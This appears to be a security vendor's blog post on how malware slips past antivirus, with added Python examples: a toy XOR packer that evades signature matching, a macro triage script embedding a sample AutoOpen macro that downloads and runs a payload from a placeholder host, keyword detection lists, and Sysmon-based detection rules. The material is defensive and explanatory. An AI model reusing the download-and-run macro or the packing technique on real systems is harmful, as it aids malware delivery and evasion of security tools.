Threats 101
Jonathan Crowe
Aug 2016

How Malware Gets Past Antivirus

Obfuscation and process injection and encryption, oh my! 

By this point, it's commonly accepted that cybersecurity is a cat-and-mouse game. Criminals develop a new type of attack, companies adjust their security to address it, criminals adapt. Rinse and repeat.

It's a cycle that's glaringly visible in the way traditional antivirus works:

  • Criminals unleash a new type of malware that sneaks past antivirus scanning, because antivirus programs don't recognize it as malware.
  • Eventually, AV vendors catch on, create an identifying signature for the new malware, and update their blacklists to block it.
  • Criminals react by retiring that version of the malware and then tweaking or disguising a new version so that it doesn't look the same.
  • The saga continues.

In order to break this cycle, security solutions — and the brave, tireless IT pros behind implementing those solutions — need to be more disruptive. How? By shifting their focus from the signature-matching game to identifying and blocking the common behaviors all malware relies on to function. 

Malware is as malware does

To put it another way, there are many, many different variants of malware (over 390,000 reported every day, if you're keeping score at home). The standard approach has been to identify each one and add it to a blacklist. Keeping up with that volume alone is a tall order. To tilt the playing field even further, malware authors have adopted techniques specifically designed to make AV detection harder (more on those below).

A better approach is to recognize that the real distinguishing characteristic of malware isn't its signature; it's what it attempts to do.

Blacklist a signature and you can block one specific malware variant. Prevent one of the basic actions necessary for malware to execute and you can render thousands of malware variants ineffective.  

To risk a sports metaphor, instead of trying to keep up with all the different plays Bill Belichick and Tom Brady dream up, wouldn't a more effective, game-changing defense be to make it impossible for Brady to throw the ball in the first place? What if, instead of attempting to defend against a hundred different possible plays at once, we simply took away the wide receivers, limiting his options? Or, better yet, what if we simply took away the ball?

That's the type of thinking we're using to develop our new approach to endpoint protection at Barkly. Because the thing is, while all those new malware variants created each and every day may look different, at a fundamental level, most of them act the same. 

Tricks malware plays to get past antivirus

To show you what I mean, here are six examples of (mis)behaviors modern malware uses to get past antivirus and cause damage on machines. We've designed Barkly to pick up on these behaviors (and many more) and stop them in the act, before the malware can do any harm. 

Even without Barkly, however, you can make considerable progress raising your defenses against malware by making these behaviors harder for malware to pull off. (Simple example: making sure Microsoft Office macros are disabled.)


Here are the highlights:

How malware avoids detection...

1) It wears clever disguises

Most antivirus solutions still rely on signature matching: they look for byte patterns known to belong to a particular malware family. To avoid getting caught, attackers run their malware through a cryptor (a packer that encrypts the program body and prepends a small stub that decrypts it in memory at run time) or an obfuscator that rewrites the code, so the bytes on disk no longer match any known signature. The program does exactly the same thing once it runs. It's like putting on a new outfit.

For a deeper, technical dive into the use of cryptors and obfuscation techniques, see our latest Malware Chat.
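As an added illustration (not code from the original post or from Barkly), here is a toy Python version of the signature-versus-cryptor problem. The payload, the signature and the XOR "cryptor" are all constructed for the example; a real cryptor's stub decrypts the body into memory and jumps to it, but the effect on a byte-signature scanner is exactly what the toy shows, and the entropy helper at the end is the kind of heuristic scanners fall back on when signatures stop matching.

```python
"""Toy demonstration of why a cryptor defeats byte-signature matching.
Added example, not Barkly's code: the "payload" is harmless constructed
text, the "signature" is a substring of it, and the "cryptor" is a
repeating-key XOR with a fresh random key per build, plus the header a
runtime stub would need in order to decrypt it."""
import math
import os
from collections import Counter
from typing import Optional

# Constructed stand-in for a malicious program body (just text, never run).
PAYLOAD = (b"PLACEHOLDER PROGRAM: connect to c2.example.invalid; "
           b"download stage2; write run key; launch stage2\n")

# A byte pattern an AV vendor might extract from PAYLOAD as its signature.
SIGNATURE = b"download stage2; write run key"


def signature_scan(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Naive AV check: is the known byte pattern anywhere in the file?"""
    return signature in blob


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same routine encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(payload: bytes, key: Optional[bytes] = None, key_len: int = 8) -> bytes:
    """'Cryptor': encrypt the payload under a (by default fresh, random) key and
    prepend [key length][key] so a runtime stub can recover it. Every build
    therefore has different bytes on disk, and a different file hash."""
    if key is None:
        key = os.urandom(key_len)
    return bytes([len(key)]) + key + xor_crypt(payload, key)


def unpack(packed: bytes) -> bytes:
    """What the stub does in memory just before executing the payload."""
    key_len = packed[0]
    key = packed[1:1 + key_len]
    return xor_crypt(packed[1 + key_len:], key)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Encrypted or compressed data approaches 8.0, plain text
    sits around 4-5; a high-entropy executable section is the packing
    heuristic scanners lean on precisely because signatures fail here."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


if __name__ == "__main__":
    packed = pack(PAYLOAD)
    print("signature hits clean payload:", signature_scan(PAYLOAD))    # True
    print("signature hits packed build: ", signature_scan(packed))     # False
    print("stub recovers payload:       ", unpack(packed) == PAYLOAD)  # True
    print("entropy plain / packed: %.2f / %.2f"
          % (shannon_entropy(PAYLOAD), shannon_entropy(packed)))
```

Run it twice and the packed bytes (and their hash) differ each time while the recovered payload is identical, which is the whole point: a blacklist entry for one build says nothing about the next one.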

2) It sneaks into Microsoft Office files as a macro

Microsoft Office macros are helpful for automating common tasks, but they are also a favorite delivery vehicle for attackers. Office runs macros with certain names (AutoOpen and Document_Open in Word, Auto_Open and Workbook_Open in Excel) as soon as the document is opened, so if macros are enabled, or the user clicks "Enable Content" when prompted, a malicious macro can download and execute additional malware the moment the file is opened.

A well-known example of malware delivered this way is Dridex, whose spam campaigns attached Word documents with macros that downloaded the banking trojan.
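Added example (not from the original post or from Barkly): a small triage script for macro-bearing documents. It does two things a practitioner wants when a suspicious attachment arrives: check whether an OOXML file (.docm, .xlsm) even carries a vbaProject.bin part, and scan extracted VBA source for the auto-execute entry points named above together with the download-and-launch primitives malicious macros rely on. It assumes the VBA text has already been pulled out of the document (for a real file that means decompressing vbaProject.bin, which tools such as olevba do); the SAMPLE_VBA and the fake .docm are constructed for the demo.

```python
"""Macro triage: auto-exec entry points and download-and-run primitives.
Added example; the sample macro and the fake document are constructed."""
import io
import re
import zipfile

# Procedure names Office runs automatically when a document opens or closes.
AUTOEXEC_TRIGGERS = [
    "AutoOpen", "Auto_Open", "AutoClose", "Auto_Close", "AutoExec",
    "Document_Open", "Document_Close", "Workbook_Open", "Workbook_Close",
]

# Primitives a macro needs to fetch and launch a second stage (case-insensitive).
SUSPICIOUS_CALLS = [
    "Shell", "WScript.Shell", "ShellExecute", "CreateObject",
    "URLDownloadToFile", "MSXML2.XMLHTTP", "ADODB.Stream",
    "powershell", "cmd.exe", "Environ(",
]

# Constructed sample, modelled on the download-then-run pattern described
# above. Not a real macro; the URL is a reserved .invalid domain.
SAMPLE_VBA = """
Sub AutoOpen()
    Dim h As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://stage2.example.invalid/payload.exe", False
    h.Send
    Dim s As Object
    Set s = CreateObject("ADODB.Stream")
    s.Open: s.Type = 1: s.Write h.responseBody
    s.SaveToFile Environ("TEMP") & "\\svc.exe", 2
    Shell Environ("TEMP") & "\\svc.exe", vbHide
End Sub
"""


def find_autoexec(vba: str) -> list:
    """Names of procedures Office would run without the user doing anything."""
    found = []
    for name in AUTOEXEC_TRIGGERS:
        pattern = r"\b(Sub|Function)\s+" + re.escape(name) + r"\b"
        if re.search(pattern, vba, re.IGNORECASE):
            found.append(name)
    return found


def find_suspicious(vba: str) -> list:
    """Download/launch primitives present in the source (VBA is case-insensitive)."""
    return [kw for kw in SUSPICIOUS_CALLS if re.search(re.escape(kw), vba, re.IGNORECASE)]


def find_urls(vba: str) -> list:
    return re.findall(r"https?://[^\s\"']+", vba, re.IGNORECASE)


def triage(vba: str) -> dict:
    """Auto-exec plus download/launch primitives is the Dridex-style combination."""
    autoexec, suspicious = find_autoexec(vba), find_suspicious(vba)
    if autoexec and suspicious:
        verdict = "likely malicious"
    elif autoexec or suspicious:
        verdict = "review"
    else:
        verdict = "no indicators"
    return {"autoexec": autoexec, "suspicious": suspicious,
            "urls": find_urls(vba), "verdict": verdict}


def has_vba_project(ooxml_bytes: bytes) -> bool:
    """A macro-enabled OOXML document is a zip that carries a vbaProject.bin part."""
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        return any(name.endswith("vbaProject.bin") for name in z.namelist())


def build_fake_docm(with_macros: bool) -> bytes:
    """Constructed zip with the OOXML part layout (not a valid Word file;
    the vbaProject.bin content is a placeholder, not a real OLE stream)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    print("macro part present:", has_vba_project(build_fake_docm(True)))
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key:>10}: {value}")
```

The keyword list is deliberately blunt (CreateObject shows up in plenty of benign automation), which is why the verdict only goes to "likely malicious" when an auto-exec entry point and the download/launch primitives appear together; anything weaker is queued for a human.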

3) It hides inside your favorite programs

Malware likes to hide inside popular programs, such as browsers or PDF readers, so it can use that program's access and resources (its network connections, the user's logged-in sessions) to do its mischief without you noticing. The technique is called process injection: the malware writes its code into the memory of a program that is already running and gets that program to execute it, typically by allocating memory in the target process, copying the code into it and starting a thread there. An antivirus scan of the browser's executable on disk sees nothing wrong, because that file was never modified.

Once it’s on a device…

4) It launches a coup for system admin privileges

Power-hungry malware attempts to gain administrator (or SYSTEM) privileges so it can disable security software, install drivers and persist system-wide. It does this by working around the controls the operating system uses to enforce user access control and authorization: bypassing User Account Control prompts, exploiting vulnerabilities in the kernel or in drivers, or abusing misconfigured services that already run with high privileges.

That's why it's typically a good idea to limit user access privileges to the bare minimum people need to do their jobs, and in particular not to hand out local administrator rights by default. Malware that lands as a standard user has to work much harder for a foothold, and a compromised non-admin account limits what it can reach.

5) It uses handy tools to steal your passwords

Malware uses purpose-built tools, such as keyloggers and credential stealers, to get the keys to the systems you have access to. Keyloggers record what you type; credential stealers pull saved passwords out of browsers and email clients, or read cached credentials and password hashes straight out of the memory of the Windows authentication process (lsass.exe). Either way the attacker ends up with your passwords, leaving every system you log into vulnerable.
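The behaviors in items 3 and 5 both leave a footprint that endpoint telemetry can see even when the file on disk looks clean, and the detection logic for the two is almost the same, so one added example (not code from the original post or from Barkly) covers both. It runs over constructed Sysmon-style events: Event ID 8 (CreateRemoteThread) is the classic trace of process injection, and Event ID 10 (ProcessAccess) with memory-read access to lsass.exe is the trace of credential dumping. The sample events, the list of high-value targets and the allowlist of legitimate lsass readers are assumptions a real deployment would tune.

```python
"""Behavioral detection over Sysmon-style events: process injection
(Event 8) and credential dumping from lsass.exe (Event 10).
Added example; all events below are constructed, not real telemetry."""

# Windows process access rights that matter for these two behaviors.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Processes whose memory is a prize for injection (browsers, readers). Assumed list.
HIGH_VALUE_TARGETS = {"chrome.exe", "firefox.exe", "iexplore.exe", "acrord32.exe"}

# Assumed allowlist of legitimate lsass readers; tune to your environment.
LSASS_READERS_ALLOWED = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}

# Constructed events using the field names Sysmon logs for Event IDs 8 and 10.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\invoice.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "StartAddress": "0x00000000024F0000", "StartModule": ""},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "StartAddress": "0x00007FF812345678", "StartModule": r"C:\Windows\System32\ntdll.dll"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\invoice.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d3c4|UNKNOWN(000001E2A7B00000)"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d3c4"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": ""},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_remote_thread(ev: dict):
    """Event 8: a thread started in another process by something that is not that process."""
    src, dst = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    if src == dst:
        return None  # same-image thread creation (e.g. browser sandbox helpers) is routine
    reasons = []
    if dst in HIGH_VALUE_TARGETS:
        reasons.append("remote thread in high-value target")
    if not ev.get("StartModule"):
        reasons.append("thread start address not backed by a loaded module")
    if reasons:
        return {"rule": "process_injection", "source": src, "target": dst, "reasons": reasons}
    return None


def check_lsass_access(ev: dict):
    """Event 10: someone outside the allowlist opened lsass.exe with memory access."""
    src, dst = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    if dst != "lsass.exe":
        return None
    access = int(ev["GrantedAccess"], 16)
    if not access & (PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD):
        return None  # e.g. 0x1000 (QueryLimitedInformation) from Task Manager
    if src in LSASS_READERS_ALLOWED:
        return None
    reasons = ["memory access to lsass.exe"]
    if "UNKNOWN" in ev.get("CallTrace", ""):
        reasons.append("call trace from unbacked memory")  # injected code calling OpenProcess
    return {"rule": "credential_dumping", "source": src, "access": hex(access), "reasons": reasons}


def triage_events(events: list) -> list:
    handlers = {8: check_remote_thread, 10: check_lsass_access}
    alerts = []
    for ev in events:
        handler = handlers.get(ev.get("EventID"))
        alert = handler(ev) if handler else None
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print(alert)
```

The two rules share one idea: judge the actor and the action (who opened which process with what access), not the file. invoice.exe is flagged twice here even though nothing about its bytes was examined, which is the shift the article is arguing for.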

6) It looks around for unsuspecting files to invade

Some malware scans every file on your hard drive and overwrites or wraps as many of them as it can with a malicious executable component, the classic parasitic virus behavior. When you open one of those files, the malicious code runs first, and the infection spreads further.

Virlock ransomware is one scary example: it combines parasitic virus techniques with ransomware, infecting and encrypting as many files as it can, so that every infected file becomes a fresh carrier of the malware. Cleaning up means disinfecting every file, not just deleting one executable.
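Added example (not from the original post or from Barkly) of the check that catches this behavior after the fact: a minimal file-integrity baseline. It hashes every file under a directory, then on re-scan reports what changed and, specifically, files that were not executables before but now begin with the MZ header of a Windows executable, which is what a parasitic infector leaves behind. The directory tree and the "infection" are constructed in a temporary directory so the demo runs anywhere.

```python
"""File-integrity baseline that flags documents turned into executables.
Added example; the file tree and the simulated infection are constructed."""
import hashlib
import tempfile
from pathlib import Path

MZ = b"MZ"  # first two bytes of every Windows PE executable


def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _is_pe(path: Path) -> bool:
    with open(path, "rb") as f:
        return f.read(2) == MZ


def baseline(root: Path) -> dict:
    """Map of relative path -> (sha256, is_pe) for every regular file under root."""
    snapshot = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            snapshot[p.relative_to(root).as_posix()] = (_sha256(p), _is_pe(p))
    return snapshot


def compare(old: dict, new: dict) -> dict:
    """Classify changes; 'turned_executable' is the parasitic-infector signature."""
    report = {"modified": [], "turned_executable": [], "added": [], "removed": []}
    for rel, (digest, is_pe) in new.items():
        if rel not in old:
            report["added"].append(rel)
            continue
        old_digest, old_pe = old[rel]
        if digest != old_digest:
            report["modified"].append(rel)
            if is_pe and not old_pe:
                report["turned_executable"].append(rel)
    report["removed"] = [rel for rel in old if rel not in new]
    return report


def demo() -> dict:
    """Build a small tree, baseline it, simulate an infection, re-scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "docs").mkdir()
        (root / "docs" / "budget.txt").write_bytes(b"Q3 numbers\n")
        (root / "docs" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 fake jpeg")
        (root / "tool.exe").write_bytes(b"MZ fake tool")
        before = baseline(root)

        # Simulated infector (no real code, just a marker): a document is
        # wrapped in an executable stub carrying the original content, and
        # an existing executable gets code appended to it.
        victim = root / "docs" / "budget.txt"
        victim.write_bytes(b"MZ<stub>" + victim.read_bytes())
        (root / "tool.exe").write_bytes(b"MZ fake tool with appended junk")

        return compare(before, baseline(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind:>17}: {files}")
```

Two caveats a practitioner would add. The baseline must be stored somewhere the malware cannot reach (a file infector that can rewrite your documents can rewrite a manifest sitting beside them), and "modified but still a PE" is only interesting for executables you did not deliberately update, so pair this with your patch records.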


Free malware protection

You likely already have antivirus. And that's a good thing. But if you’re like the other 90% of security professionals actively looking to replace or augment their current AV, you’ve also got good reason to think antivirus alone isn’t enough.

Here at Barkly, we’re excited to be driving a major shift toward better endpoint protection built around understanding, monitoring, and reacting to malicious behavior. 

If you're interested in seeing what types of malware your antivirus is missing, you can give Barkly a free spin right now. You'll even be protected from malware that hasn't been seen yet. 

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.

